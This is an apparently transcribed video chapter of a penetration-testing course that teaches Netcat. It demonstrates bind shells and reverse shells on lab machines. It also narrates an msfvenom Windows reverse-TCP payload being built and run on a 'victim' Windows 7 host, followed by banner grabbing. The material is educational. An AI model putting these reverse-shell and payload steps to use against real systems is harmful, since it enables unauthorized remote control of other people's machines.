Hello and welcome to another chapter. In this chapter, we are going to learn one of the most powerful tool that we'll be using during our security testing is Netcat. So Netcat is really great tool because it typically helps in creating bind shell or reverse shell for our security testing works, which we'll be seeing as in part of demo in this particular chapter. So let's understand what is the Netcat. Netcat is a networking tool for reading and writing data across the network using TCP or UDP connection, right? So it has really cool feature that is very helpful during our penetration testing because you can use or utilize a specific port for your communication. Now Netcat is very light in size, like 40 KB kind of, so which make it more portable to use from one system to another system for creating bind shell and reverse shell and get your penetration testing done. Now, what is the bind shell and reverse shell? Let's understand that in a bit. But before that, you just need to understand what exactly a shell is. So, a shell is a software that acts as intermediate between your user and kernel. So, it provides basically interface between your user and your kernel. Now, let's jump into this bind shell and reverse shell concept. I'll explain with your graph so that you get better idea. Okay. Now, let's consider I have a user A who is basically running in a net, right, or net connection or behind a net connection with a private address, IP address. So let's say I'm saying one of the private IP address that has been assigned to user A, which is behind a net connection, okay, and is connected to your internet. Okay, let's say I am using another color pen to mark it as an internet. This is your internet. Okay, and I have another user B, right, who is using as a part of your public user or who is using as a public IP address. User B who is having again public IP. Okay, I have little bad handwriting, but hope you can get some idea out of it. Cool. Now let's understand under what scenario a particular user A or user B would be using either bind shell or reverse shell. Right now, consider I'm explaining first the bind shell case where user A or B how when exactly they is going to need the bind shell. So in bind shell, let's say user B has encountered some issue, right, and he basically needs some help from your user A, right. This is a simple scenario. User B has encountered some issue and needs some help from user A. Now remember, user B is running behind your public IP address, whereas user A is running behind your net connection. So what user A can do or what user B can do basically simply create a bind shell and either tie up with your command.exe or maybe bin bash to a specific port and send the information to user A with the port number details, right? So in this scenario, user A can simply directly connect to user B machine and get the shell directly, right? So this is a simple scenario that I have just said you about bind shell. So let's go ahead and understand that using our demo. I'll simply go to my terminal and create a bind shell, right? Now user B needs some help. So you can simply type netcat hyphen nlvp, okay, and say I'm going to use port number 5555 and I'm going to give my bin bash as in service. Right, so it is listening to anyone who is having which trying to connect to your 5555. Now as I said, user B is running behind your public IP address, right, as per the scenario, and user A is inside your private IP address. So let's go to user A now. So I'll go to simply cmd netcat, right, and what I can do, I can simply try to connect to your uh, IP address of user B by providing -nv as an option, and type 192.168.233. But I guess 137 is my IP address. Consider this is in public IP address in this particular case. I know this is not a public IP address, but I'm just trying to explain you the scenario. And this is trying to connect your port number 5555. Now, as soon as you type this port number 5555 and press enter, you can see a connection has been opened. You can type ID. This will be user, that is your Kali user, right? You can type if config. So you can basically run all the shell command for user B and troubleshoot all this issue. So this is a simple scenario about your bind shell. Now let's understand what exactly a reverse shell it is. I'll go back to my graph again. Okay. Now, so in a reverse shell scenario, let me just clear a few things. I'll just using eraser to erase, yeah, large eraser. Again, the scenario remains same. So like user A is connected behind a net and user B is directly having a public IP address. So so let's suppose that user A has particularly encountered some issues, right? And user A needs some help behind or help from user B. So in this case, user A is basically running behind your private IP address or net IP address. So which in this case, user A cannot basically directly share a bind shell, right? Because it doesn't have any public IP address for communication. So bind shell is totally not possible in this case. So now to achieve this to achieve solution in this particular case, what user A needs to do is send his command prompt basically, right? So user A will send his command prompt to user B. Okay, so let's see how it is done in your I mean practically. So this is basically a scenario of your reverse shell. Let's get into the demo part so that you will get better idea. So I've just closed it. So what I'm going to do is, let's say what I'm doing is, yeah, I am, so this is user A right now. So he can type netcat, let's say, since he knows the IP address of our target system, so he can type directly 192, sorry, netcat. Okay, let's do other way around. Let's say user B is trying to listening right now, so we can type netcat hyphen nlvp, and I'm listening on port number 5555 for any incoming, right? And let's say user A will give his cell connection, so he can directly say netcat then IP address. I think I need to check the IP address. I guess it is 137. Yeah, it is 137. It's mentioned already. So 137 and then hyphen E can provide, or I can then specify the port 5555, right? And hyphen E, what I'm going to provide in port number 555 is your cmd.exe. Now if you see in user like B would be getting some command prompt from user A, right? That way user B can troubleshoot your user A, right? So like this particular case. So in this case, he's just getting a reverse shell from user to get a particular task done. I can type verified like dir, or even I can type fconfig. All those command prompt will work. Sorry, ipconfig. Right. So this is the way this reverse shell work, and as I explained earlier, the bind shell concept directly. Now let's see how we can create a reverse shell using MSF Venom and listen to it using our netcat. So this is one of the scenario that is pretty common during your pen testing or secret testing, where you will be having a target which is able to run an exe or in a particular binary, and you would want to get a reverse shell out of it using your netcat. Now let's go ahead and create an exe file and try to get a reverse shell out of it. So I'll just go to my Kali terminal and type Venom or MSF Venom, right? Hyphen P. I'm going to use Windows, right? Shell. Since I'm going for reverse TCP, reverse TCP, and I'm going to say, let's say L host, my local host 192.168.230.137, and I'm going to say L port to be, let's say 4444. Yeah, and hyphen say I'm going to output format to be in exe, and then I'm going to say keep it in my this particular path, let's say payload.exe, right? So as soon as I type, you would see a payload file has been created, payload.exe. It is still in progress. We'll wait for some time. Okay, so it has now generated payload.exe having size 324. Now let's transfer or send this particular exe file to our victim system and initiate our netcat connection. So I can simply type netcat hyphen lvvp, and I am going to listen on port number 4444. Let me verify. Okay, cool. 4444. Okay, let me send this particular file to my Windows 7 system. So I have downloaded this payload and let's run this. I'll just run it. Now as soon as I run it, and if I go back here, I could see that my netcat has given me the reverse shell connection of the command prompt or the CMD. I can type ifconfig, sorry, ipconfig in case of Windows, right? So this way I get the reverse shell connection of my Windows system. Now this is the way you can create a reverse shell using your MSF Venom. Now similarly, netcat has more potential, like you can perform banner grabbing, you can perform port scanning, you can perform file transfer task, and lot many things, right? So let's see how we can do some of the example. Let me go to my terminal. So you can type netcat-v and provide the IP address 192.168.233.129, my Windows system, and let's say I'm checking for port number 445. Now over here you could see the Varus banner, right? For port number 445, and Microsoft-DS service is running. So this is one of the way I just showed you. Similarly, you can try for various other command that I have given. You can also perform a port scanning using netcat also, right? And as well as file transfer. So these are some of the useful features of your netcat which we'll be using during our pen testing time.